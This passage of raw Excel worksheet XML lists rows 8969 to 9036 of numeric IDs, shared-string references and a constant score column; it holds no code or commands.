      <c r="C8969" s="2" t="s">
        <v>8551</v>
      </c>
      <c r="D8969" s="2">
        <v>1.0</v>
      </c>
      <c r="E8969" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8969" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="8970" ht="15.75" customHeight="1">
      <c r="A8970" s="1">
        <v>7806.0</v>
      </c>
      <c r="B8970" s="2">
        <v>5.2234167E7</v>
      </c>
      <c r="C8970" s="2" t="s">
        <v>8552</v>
      </c>
      <c r="D8970" s="2">
        <v>1.0</v>
      </c>
      <c r="E8970" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8970" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="8971" ht="15.75" customHeight="1">
      <c r="A8971" s="1">
        <v>7839.0</v>
      </c>
      <c r="B8971" s="2">
        <v>5.2322714E7</v>
      </c>
      <c r="C8971" s="2" t="s">
        <v>8553</v>
      </c>
      <c r="D8971" s="2">
        <v>1.0</v>
      </c>
      <c r="E8971" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8971" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="8972" ht="15.75" customHeight="1">
      <c r="A8972" s="1">
        <v>7997.0</v>
      </c>
      <c r="B8972" s="2">
        <v>5.2777186E7</v>
      </c>
      <c r="C8972" s="2" t="s">
        <v>8554</v>
      </c>
      <c r="D8972" s="2">
        <v>1.0</v>
      </c>
      <c r="E8972" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8972" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="8973" ht="15.75" customHeight="1">
      <c r="A8973" s="1">
        <v>8333.0</v>
      </c>
      <c r="B8973" s="2">
        <v>5.3676929E7</v>
      </c>
      <c r="C8973" s="2" t="s">
        <v>8555</v>
      </c>
      <c r="D8973" s="2">
        <v>1.0</v>
      </c>
      <c r="E8973" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8973" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="8974" ht="15.75" customHeight="1">
      <c r="A8974" s="1">
        <v>8505.0</v>
      </c>
      <c r="B8974" s="2">
        <v>5.404648E7</v>
      </c>
      <c r="C8974" s="2" t="s">
        <v>8556</v>
      </c>
      <c r="D8974" s="2">
        <v>1.0</v>
      </c>
      <c r="E8974" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8974" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="8975" ht="15.75" customHeight="1">
      <c r="A8975" s="1">
        <v>8630.0</v>
      </c>
      <c r="B8975" s="2">
        <v>5.4315171E7</v>
      </c>
      <c r="C8975" s="2" t="s">
        <v>8557</v>
      </c>
      <c r="D8975" s="2">
        <v>1.0</v>
      </c>
      <c r="E8975" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8975" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="8976" ht="15.75" customHeight="1">
      <c r="A8976" s="1">
        <v>8667.0</v>
      </c>
      <c r="B8976" s="2">
        <v>5.4361448E7</v>
      </c>
      <c r="C8976" s="2" t="s">
        <v>8558</v>
      </c>
      <c r="D8976" s="2">
        <v>1.0</v>
      </c>
      <c r="E8976" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8976" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="8977" ht="15.75" customHeight="1">
      <c r="A8977" s="1">
        <v>8912.0</v>
      </c>
      <c r="B8977" s="2">
        <v>5.4811015E7</v>
      </c>
      <c r="C8977" s="2" t="s">
        <v>8559</v>
      </c>
      <c r="D8977" s="2">
        <v>1.0</v>
      </c>
      <c r="E8977" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8977" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="8978" ht="15.75" customHeight="1">
      <c r="A8978" s="1">
        <v>9707.0</v>
      </c>
      <c r="B8978" s="2">
        <v>5.6384828E7</v>
      </c>
      <c r="C8978" s="2" t="s">
        <v>8560</v>
      </c>
      <c r="D8978" s="2">
        <v>1.0</v>
      </c>
      <c r="E8978" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8978" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="8979" ht="15.75" customHeight="1">
      <c r="A8979" s="1">
        <v>9783.0</v>
      </c>
      <c r="B8979" s="2">
        <v>5.6518536E7</v>
      </c>
      <c r="C8979" s="2" t="s">
        <v>8561</v>
      </c>
      <c r="D8979" s="2">
        <v>1.0</v>
      </c>
      <c r="E8979" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8979" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="8980" ht="15.75" customHeight="1">
      <c r="A8980" s="1">
        <v>9867.0</v>
      </c>
      <c r="B8980" s="2">
        <v>5.6726836E7</v>
      </c>
      <c r="C8980" s="2" t="s">
        <v>8562</v>
      </c>
      <c r="D8980" s="2">
        <v>1.0</v>
      </c>
      <c r="E8980" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8980" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="8981" ht="15.75" customHeight="1">
      <c r="A8981" s="1">
        <v>9879.0</v>
      </c>
      <c r="B8981" s="2">
        <v>5.6746724E7</v>
      </c>
      <c r="C8981" s="2" t="s">
        <v>8563</v>
      </c>
      <c r="D8981" s="2">
        <v>1.0</v>
      </c>
      <c r="E8981" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8981" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="8982" ht="15.75" customHeight="1">
      <c r="A8982" s="1">
        <v>10041.0</v>
      </c>
      <c r="B8982" s="2">
        <v>5.7075255E7</v>
      </c>
      <c r="C8982" s="2" t="s">
        <v>8564</v>
      </c>
      <c r="D8982" s="2">
        <v>1.0</v>
      </c>
      <c r="E8982" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8982" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="8983" ht="15.75" customHeight="1">
      <c r="A8983" s="1">
        <v>10061.0</v>
      </c>
      <c r="B8983" s="2">
        <v>5.7126509E7</v>
      </c>
      <c r="C8983" s="2" t="s">
        <v>8565</v>
      </c>
      <c r="D8983" s="2">
        <v>1.0</v>
      </c>
      <c r="E8983" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8983" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="8984" ht="15.75" customHeight="1">
      <c r="A8984" s="1">
        <v>10251.0</v>
      </c>
      <c r="B8984" s="2">
        <v>5.7547605E7</v>
      </c>
      <c r="C8984" s="2" t="s">
        <v>8566</v>
      </c>
      <c r="D8984" s="2">
        <v>1.0</v>
      </c>
      <c r="E8984" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8984" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="8985" ht="15.75" customHeight="1">
      <c r="A8985" s="1">
        <v>10641.0</v>
      </c>
      <c r="B8985" s="2">
        <v>1.4119532E7</v>
      </c>
      <c r="C8985" s="2" t="s">
        <v>8567</v>
      </c>
      <c r="D8985" s="2">
        <v>1.0</v>
      </c>
      <c r="E8985" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8985" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="8986" ht="15.75" customHeight="1">
      <c r="A8986" s="1">
        <v>10740.0</v>
      </c>
      <c r="B8986" s="2">
        <v>1.5372855E7</v>
      </c>
      <c r="C8986" s="2" t="s">
        <v>8568</v>
      </c>
      <c r="D8986" s="2">
        <v>1.0</v>
      </c>
      <c r="E8986" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8986" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="8987" ht="15.75" customHeight="1">
      <c r="A8987" s="1">
        <v>10801.0</v>
      </c>
      <c r="B8987" s="2">
        <v>1.5814518E7</v>
      </c>
      <c r="C8987" s="2" t="s">
        <v>8569</v>
      </c>
      <c r="D8987" s="2">
        <v>1.0</v>
      </c>
      <c r="E8987" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8987" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="8988" ht="15.75" customHeight="1">
      <c r="A8988" s="1">
        <v>10888.0</v>
      </c>
      <c r="B8988" s="2">
        <v>1.6546779E7</v>
      </c>
      <c r="C8988" s="2" t="s">
        <v>8570</v>
      </c>
      <c r="D8988" s="2">
        <v>1.0</v>
      </c>
      <c r="E8988" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8988" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="8989" ht="15.75" customHeight="1">
      <c r="A8989" s="1">
        <v>11251.0</v>
      </c>
      <c r="B8989" s="2">
        <v>2.0534498E7</v>
      </c>
      <c r="C8989" s="2" t="s">
        <v>8571</v>
      </c>
      <c r="D8989" s="2">
        <v>1.0</v>
      </c>
      <c r="E8989" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8989" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="8990" ht="15.75" customHeight="1">
      <c r="A8990" s="1">
        <v>11281.0</v>
      </c>
      <c r="B8990" s="2">
        <v>2.0794462E7</v>
      </c>
      <c r="C8990" s="2" t="s">
        <v>8572</v>
      </c>
      <c r="D8990" s="2">
        <v>1.0</v>
      </c>
      <c r="E8990" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8990" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="8991" ht="15.75" customHeight="1">
      <c r="A8991" s="1">
        <v>11770.0</v>
      </c>
      <c r="B8991" s="2">
        <v>2.4226298E7</v>
      </c>
      <c r="C8991" s="2" t="s">
        <v>8573</v>
      </c>
      <c r="D8991" s="2">
        <v>1.0</v>
      </c>
      <c r="E8991" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8991" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="8992" ht="15.75" customHeight="1">
      <c r="A8992" s="1">
        <v>11857.0</v>
      </c>
      <c r="B8992" s="2">
        <v>2.4822663E7</v>
      </c>
      <c r="C8992" s="2" t="s">
        <v>8574</v>
      </c>
      <c r="D8992" s="2">
        <v>1.0</v>
      </c>
      <c r="E8992" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8992" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="8993" ht="15.75" customHeight="1">
      <c r="A8993" s="1">
        <v>12207.0</v>
      </c>
      <c r="B8993" s="2">
        <v>2.7575431E7</v>
      </c>
      <c r="C8993" s="2" t="s">
        <v>8575</v>
      </c>
      <c r="D8993" s="2">
        <v>1.0</v>
      </c>
      <c r="E8993" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8993" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="8994" ht="15.75" customHeight="1">
      <c r="A8994" s="1">
        <v>12303.0</v>
      </c>
      <c r="B8994" s="2">
        <v>2.8350388E7</v>
      </c>
      <c r="C8994" s="2" t="s">
        <v>8576</v>
      </c>
      <c r="D8994" s="2">
        <v>1.0</v>
      </c>
      <c r="E8994" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8994" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="8995" ht="15.75" customHeight="1">
      <c r="A8995" s="1">
        <v>12311.0</v>
      </c>
      <c r="B8995" s="2">
        <v>2.8402227E7</v>
      </c>
      <c r="C8995" s="2" t="s">
        <v>8577</v>
      </c>
      <c r="D8995" s="2">
        <v>1.0</v>
      </c>
      <c r="E8995" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8995" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="8996" ht="15.75" customHeight="1">
      <c r="A8996" s="1">
        <v>12315.0</v>
      </c>
      <c r="B8996" s="2">
        <v>2.8425453E7</v>
      </c>
      <c r="C8996" s="2" t="s">
        <v>8578</v>
      </c>
      <c r="D8996" s="2">
        <v>1.0</v>
      </c>
      <c r="E8996" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8996" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="8997" ht="15.75" customHeight="1">
      <c r="A8997" s="1">
        <v>13186.0</v>
      </c>
      <c r="B8997" s="2">
        <v>3.40575E7</v>
      </c>
      <c r="C8997" s="2" t="s">
        <v>8579</v>
      </c>
      <c r="D8997" s="2">
        <v>1.0</v>
      </c>
      <c r="E8997" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8997" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="8998" ht="15.75" customHeight="1">
      <c r="A8998" s="1">
        <v>13526.0</v>
      </c>
      <c r="B8998" s="2">
        <v>3.5519259E7</v>
      </c>
      <c r="C8998" s="2" t="s">
        <v>8580</v>
      </c>
      <c r="D8998" s="2">
        <v>1.0</v>
      </c>
      <c r="E8998" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8998" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="8999" ht="15.75" customHeight="1">
      <c r="A8999" s="1">
        <v>13833.0</v>
      </c>
      <c r="B8999" s="2">
        <v>3.6775952E7</v>
      </c>
      <c r="C8999" s="2" t="s">
        <v>8581</v>
      </c>
      <c r="D8999" s="2">
        <v>1.0</v>
      </c>
      <c r="E8999" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8999" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="9000" ht="15.75" customHeight="1">
      <c r="A9000" s="1">
        <v>13856.0</v>
      </c>
      <c r="B9000" s="2">
        <v>3.6926716E7</v>
      </c>
      <c r="C9000" s="2" t="s">
        <v>8582</v>
      </c>
      <c r="D9000" s="2">
        <v>1.0</v>
      </c>
      <c r="E9000" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9000" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="9001" ht="15.75" customHeight="1">
      <c r="A9001" s="1">
        <v>14058.0</v>
      </c>
      <c r="B9001" s="2">
        <v>3.7558754E7</v>
      </c>
      <c r="C9001" s="2" t="s">
        <v>8583</v>
      </c>
      <c r="D9001" s="2">
        <v>1.0</v>
      </c>
      <c r="E9001" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9001" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="9002" ht="15.75" customHeight="1">
      <c r="A9002" s="1">
        <v>14282.0</v>
      </c>
      <c r="B9002" s="2">
        <v>3.8468485E7</v>
      </c>
      <c r="C9002" s="2" t="s">
        <v>8584</v>
      </c>
      <c r="D9002" s="2">
        <v>1.0</v>
      </c>
      <c r="E9002" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9002" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="9003" ht="15.75" customHeight="1">
      <c r="A9003" s="1">
        <v>14896.0</v>
      </c>
      <c r="B9003" s="2">
        <v>4.1148769E7</v>
      </c>
      <c r="C9003" s="2" t="s">
        <v>8585</v>
      </c>
      <c r="D9003" s="2">
        <v>1.0</v>
      </c>
      <c r="E9003" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9003" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="9004" ht="15.75" customHeight="1">
      <c r="A9004" s="1">
        <v>15629.0</v>
      </c>
      <c r="B9004" s="2">
        <v>4.3576309E7</v>
      </c>
      <c r="C9004" s="2" t="s">
        <v>8586</v>
      </c>
      <c r="D9004" s="2">
        <v>1.0</v>
      </c>
      <c r="E9004" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9004" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="9005" ht="15.75" customHeight="1">
      <c r="A9005" s="1">
        <v>15656.0</v>
      </c>
      <c r="B9005" s="2">
        <v>4.3659151E7</v>
      </c>
      <c r="C9005" s="2" t="s">
        <v>8587</v>
      </c>
      <c r="D9005" s="2">
        <v>1.0</v>
      </c>
      <c r="E9005" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9005" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="9006" ht="15.75" customHeight="1">
      <c r="A9006" s="1">
        <v>15698.0</v>
      </c>
      <c r="B9006" s="2">
        <v>4.3901567E7</v>
      </c>
      <c r="C9006" s="2" t="s">
        <v>8588</v>
      </c>
      <c r="D9006" s="2">
        <v>1.0</v>
      </c>
      <c r="E9006" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9006" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="9007" ht="15.75" customHeight="1">
      <c r="A9007" s="1">
        <v>15878.0</v>
      </c>
      <c r="B9007" s="2">
        <v>4.4513766E7</v>
      </c>
      <c r="C9007" s="2" t="s">
        <v>8589</v>
      </c>
      <c r="D9007" s="2">
        <v>1.0</v>
      </c>
      <c r="E9007" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9007" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="9008" ht="15.75" customHeight="1">
      <c r="A9008" s="1">
        <v>16156.0</v>
      </c>
      <c r="B9008" s="2">
        <v>4.5577557E7</v>
      </c>
      <c r="C9008" s="2" t="s">
        <v>8590</v>
      </c>
      <c r="D9008" s="2">
        <v>1.0</v>
      </c>
      <c r="E9008" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9008" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="9009" ht="15.75" customHeight="1">
      <c r="A9009" s="1">
        <v>16321.0</v>
      </c>
      <c r="B9009" s="2">
        <v>4.5986226E7</v>
      </c>
      <c r="C9009" s="2" t="s">
        <v>8591</v>
      </c>
      <c r="D9009" s="2">
        <v>1.0</v>
      </c>
      <c r="E9009" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9009" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="9010" ht="15.75" customHeight="1">
      <c r="A9010" s="1">
        <v>16520.0</v>
      </c>
      <c r="B9010" s="2">
        <v>4.6643777E7</v>
      </c>
      <c r="C9010" s="2" t="s">
        <v>8592</v>
      </c>
      <c r="D9010" s="2">
        <v>1.0</v>
      </c>
      <c r="E9010" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9010" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="9011" ht="15.75" customHeight="1">
      <c r="A9011" s="1">
        <v>16644.0</v>
      </c>
      <c r="B9011" s="2">
        <v>4.7166379E7</v>
      </c>
      <c r="C9011" s="2" t="s">
        <v>8593</v>
      </c>
      <c r="D9011" s="2">
        <v>1.0</v>
      </c>
      <c r="E9011" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9011" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="9012" ht="15.75" customHeight="1">
      <c r="A9012" s="1">
        <v>16938.0</v>
      </c>
      <c r="B9012" s="2">
        <v>4.8190964E7</v>
      </c>
      <c r="C9012" s="2" t="s">
        <v>8594</v>
      </c>
      <c r="D9012" s="2">
        <v>1.0</v>
      </c>
      <c r="E9012" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9012" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="9013" ht="15.75" customHeight="1">
      <c r="A9013" s="1">
        <v>17942.0</v>
      </c>
      <c r="B9013" s="2">
        <v>5.1249805E7</v>
      </c>
      <c r="C9013" s="2" t="s">
        <v>8595</v>
      </c>
      <c r="D9013" s="2">
        <v>1.0</v>
      </c>
      <c r="E9013" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9013" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="9014" ht="15.75" customHeight="1">
      <c r="A9014" s="1">
        <v>18140.0</v>
      </c>
      <c r="B9014" s="2">
        <v>5.18275E7</v>
      </c>
      <c r="C9014" s="2" t="s">
        <v>8596</v>
      </c>
      <c r="D9014" s="2">
        <v>1.0</v>
      </c>
      <c r="E9014" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9014" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="9015" ht="15.75" customHeight="1">
      <c r="A9015" s="1">
        <v>18620.0</v>
      </c>
      <c r="B9015" s="2">
        <v>5.3348928E7</v>
      </c>
      <c r="C9015" s="2" t="s">
        <v>8597</v>
      </c>
      <c r="D9015" s="2">
        <v>1.0</v>
      </c>
      <c r="E9015" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9015" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="9016" ht="15.75" customHeight="1">
      <c r="A9016" s="1">
        <v>18958.0</v>
      </c>
      <c r="B9016" s="2">
        <v>5.435524E7</v>
      </c>
      <c r="C9016" s="2" t="s">
        <v>8598</v>
      </c>
      <c r="D9016" s="2">
        <v>1.0</v>
      </c>
      <c r="E9016" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9016" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="9017" ht="15.75" customHeight="1">
      <c r="A9017" s="1">
        <v>19014.0</v>
      </c>
      <c r="B9017" s="2">
        <v>5.4521956E7</v>
      </c>
      <c r="C9017" s="2" t="s">
        <v>8599</v>
      </c>
      <c r="D9017" s="2">
        <v>1.0</v>
      </c>
      <c r="E9017" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9017" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="9018" ht="15.75" customHeight="1">
      <c r="A9018" s="1">
        <v>19101.0</v>
      </c>
      <c r="B9018" s="2">
        <v>5.4704781E7</v>
      </c>
      <c r="C9018" s="2" t="s">
        <v>8600</v>
      </c>
      <c r="D9018" s="2">
        <v>1.0</v>
      </c>
      <c r="E9018" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9018" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="9019" ht="15.75" customHeight="1">
      <c r="A9019" s="1">
        <v>20023.0</v>
      </c>
      <c r="B9019" s="2">
        <v>649208.0</v>
      </c>
      <c r="C9019" s="2" t="s">
        <v>8601</v>
      </c>
      <c r="D9019" s="2">
        <v>1.0</v>
      </c>
      <c r="E9019" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9019" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="9020" ht="15.75" customHeight="1">
      <c r="A9020" s="1">
        <v>22145.0</v>
      </c>
      <c r="B9020" s="2">
        <v>3.1246612E7</v>
      </c>
      <c r="C9020" s="2" t="s">
        <v>8602</v>
      </c>
      <c r="D9020" s="2">
        <v>1.0</v>
      </c>
      <c r="E9020" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9020" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="9021" ht="15.75" customHeight="1">
      <c r="A9021" s="1">
        <v>22758.0</v>
      </c>
      <c r="B9021" s="2">
        <v>4.4660855E7</v>
      </c>
      <c r="C9021" s="2" t="s">
        <v>8603</v>
      </c>
      <c r="D9021" s="2">
        <v>1.0</v>
      </c>
      <c r="E9021" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9021" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="9022" ht="15.75" customHeight="1">
      <c r="A9022" s="1">
        <v>23127.0</v>
      </c>
      <c r="B9022" s="2">
        <v>5135184.0</v>
      </c>
      <c r="C9022" s="2" t="s">
        <v>8604</v>
      </c>
      <c r="D9022" s="2">
        <v>1.0</v>
      </c>
      <c r="E9022" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9022" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="9023" ht="15.75" customHeight="1">
      <c r="A9023" s="1">
        <v>23546.0</v>
      </c>
      <c r="B9023" s="2">
        <v>6044809.0</v>
      </c>
      <c r="C9023" s="2" t="s">
        <v>8605</v>
      </c>
      <c r="D9023" s="2">
        <v>1.0</v>
      </c>
      <c r="E9023" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9023" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="9024" ht="15.75" customHeight="1">
      <c r="A9024" s="1">
        <v>24295.0</v>
      </c>
      <c r="B9024" s="2">
        <v>1.0557879E7</v>
      </c>
      <c r="C9024" s="2" t="s">
        <v>8606</v>
      </c>
      <c r="D9024" s="2">
        <v>1.0</v>
      </c>
      <c r="E9024" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9024" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="9025" ht="15.75" customHeight="1">
      <c r="A9025" s="1">
        <v>26753.0</v>
      </c>
      <c r="B9025" s="2">
        <v>1.8397296E7</v>
      </c>
      <c r="C9025" s="2" t="s">
        <v>8607</v>
      </c>
      <c r="D9025" s="2">
        <v>1.0</v>
      </c>
      <c r="E9025" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9025" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="9026" ht="15.75" customHeight="1">
      <c r="A9026" s="1">
        <v>28654.0</v>
      </c>
      <c r="B9026" s="2">
        <v>2.7357568E7</v>
      </c>
      <c r="C9026" s="2" t="s">
        <v>8608</v>
      </c>
      <c r="D9026" s="2">
        <v>1.0</v>
      </c>
      <c r="E9026" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9026" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="9027" ht="15.75" customHeight="1">
      <c r="A9027" s="1">
        <v>28700.0</v>
      </c>
      <c r="B9027" s="2">
        <v>2.772161E7</v>
      </c>
      <c r="C9027" s="2" t="s">
        <v>8609</v>
      </c>
      <c r="D9027" s="2">
        <v>1.0</v>
      </c>
      <c r="E9027" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9027" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="9028" ht="15.75" customHeight="1">
      <c r="A9028" s="1">
        <v>29058.0</v>
      </c>
      <c r="B9028" s="2">
        <v>3.0243972E7</v>
      </c>
      <c r="C9028" s="2" t="s">
        <v>8610</v>
      </c>
      <c r="D9028" s="2">
        <v>1.0</v>
      </c>
      <c r="E9028" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9028" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="9029" ht="15.75" customHeight="1">
      <c r="A9029" s="1">
        <v>31107.0</v>
      </c>
      <c r="B9029" s="2">
        <v>4.8635715E7</v>
      </c>
      <c r="C9029" s="2" t="s">
        <v>8611</v>
      </c>
      <c r="D9029" s="2">
        <v>1.0</v>
      </c>
      <c r="E9029" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9029" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="9030" ht="15.75" customHeight="1">
      <c r="A9030" s="1">
        <v>31604.0</v>
      </c>
      <c r="B9030" s="2">
        <v>5135183.0</v>
      </c>
      <c r="C9030" s="2" t="s">
        <v>8604</v>
      </c>
      <c r="D9030" s="2">
        <v>1.0</v>
      </c>
      <c r="E9030" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9030" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="9031" ht="15.75" customHeight="1">
      <c r="A9031" s="1">
        <v>32149.0</v>
      </c>
      <c r="B9031" s="2">
        <v>5.4256253E7</v>
      </c>
      <c r="C9031" s="2" t="s">
        <v>8612</v>
      </c>
      <c r="D9031" s="2">
        <v>1.0</v>
      </c>
      <c r="E9031" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9031" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="9032" ht="15.75" customHeight="1">
      <c r="A9032" s="1">
        <v>32455.0</v>
      </c>
      <c r="B9032" s="2">
        <v>5671041.0</v>
      </c>
      <c r="C9032" s="2" t="s">
        <v>8613</v>
      </c>
      <c r="D9032" s="2">
        <v>1.0</v>
      </c>
      <c r="E9032" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9032" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="9033" ht="15.75" customHeight="1">
      <c r="A9033" s="1">
        <v>32970.0</v>
      </c>
      <c r="B9033" s="2">
        <v>6550675.0</v>
      </c>
      <c r="C9033" s="2" t="s">
        <v>8614</v>
      </c>
      <c r="D9033" s="2">
        <v>1.0</v>
      </c>
      <c r="E9033" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9033" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="9034" ht="15.75" customHeight="1">
      <c r="A9034" s="1">
        <v>33146.0</v>
      </c>
      <c r="B9034" s="2">
        <v>7065764.0</v>
      </c>
      <c r="C9034" s="2" t="s">
        <v>8615</v>
      </c>
      <c r="D9034" s="2">
        <v>1.0</v>
      </c>
      <c r="E9034" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9034" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="9035" ht="15.75" customHeight="1">
      <c r="A9035" s="1">
        <v>33260.0</v>
      </c>
      <c r="B9035" s="2">
        <v>7361667.0</v>
      </c>
      <c r="C9035" s="2" t="s">
        <v>8616</v>
      </c>
      <c r="D9035" s="2">
        <v>1.0</v>
      </c>
      <c r="E9035" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9035" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="9036" ht="15.75" customHeight="1">
      <c r="A9036" s="1">
        <v>33345.0</v>
      </c>
      <c r="B9036" s="2">
        <v>7599918.0</v>
      </c>
